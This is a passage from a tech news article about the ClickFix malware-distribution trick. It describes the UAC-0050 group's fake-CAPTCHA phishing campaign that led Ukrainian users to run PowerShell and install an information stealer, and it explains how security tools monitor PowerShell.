- How To Privacy-Proof the Coming AI Wave
- Why the Even Realities G1 are the smart glasses to beat in 2025 - and I've tested several pairs
- VPN-ready routers may be a smartest way to connect to Wi-Fi now. I put one to the test
- 4 surprise products we could see at Samsung Unpacked 2025 - and are worth getting excited about
- You need a router-based VPN in 2025. Here's why and how to set one up
Rising ClickFix malware distribution trick puts PowerShell IT policies on notice
Even cyber-espionage groups seem to have adopted the ClickFix technique. Toward the end of October, an APT group tracked as UAC-0050 that has a history of targeting organizations from Ukraine launched a phishing campaign in Ukrainian that used fake notifications about shared documents to direct users to an attacker-controlled website. The website used the combination of reCAPTCHA Phish and ClickFix to trick users into running PowerShell as part of a CAPTCHA challenge. The code deployed a rarely used information stealer dubbed Lucky Volunteer.
Mitigation
Installed on Windows by default, PowerShell is a very powerful scripting language and environment designed to simplify and automate system administration tasks. Because of its wide adoption in malware attacks over the past 10 years, security products monitor for potentially malicious PowerShell invocations.
However, they often look for instances where PowerShell scripts are being executed by other processes, because that’s how PowerShell is typically abused — as part of a larger attack chain, such as being launched by malicious Microsoft Word macros, or a malware dropper downloading and executing a malicious PowerShell script to deploy additional payloads.
